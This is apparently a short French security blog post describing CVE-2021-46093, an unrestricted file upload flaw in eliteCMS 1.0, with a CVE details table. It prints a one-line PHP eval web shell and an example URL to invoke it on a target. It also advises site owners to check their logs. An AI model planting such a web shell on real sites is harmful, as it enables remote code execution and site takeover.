Faille CVE sur la version 1.0 d'eliteCMS

EliteCMS comme son nom l’indique est un CMS qui se veut léger. Mais pas très sécure.

On vient de découvrir un paquet de failles de conception sur ce CMS qui date de 2008.

En voici une pour l’exemple mais y a même des injections SQL disponible

Sur la page /admin/manage_upload.php ont peut faire uploader un peu ce que l on veut.

Par exemple un fichier shell.php avec ca dedans :

				
					<?php @eval($_GET['key']);?>
				
			

que l’on pourrait appeler ensuite avec cette url :

http://urldelacible/upload/shell.php?key=phpinfo();

Je vous laisse donc imaginer tout ce que l’on peut faire avec ce type de faille de cybersécurité.

Si vous avez ce genre de site épluchez vos logs.

Information Valeur

CVE

CVE-2021-46093

CVE publié le

02/02/2022

Score

7.5

Fuite de données

Partielle

Intégrité Système

Partielle

Impact sur les ressources

Partielle

Compléxité

Facile

Authentification requise

Non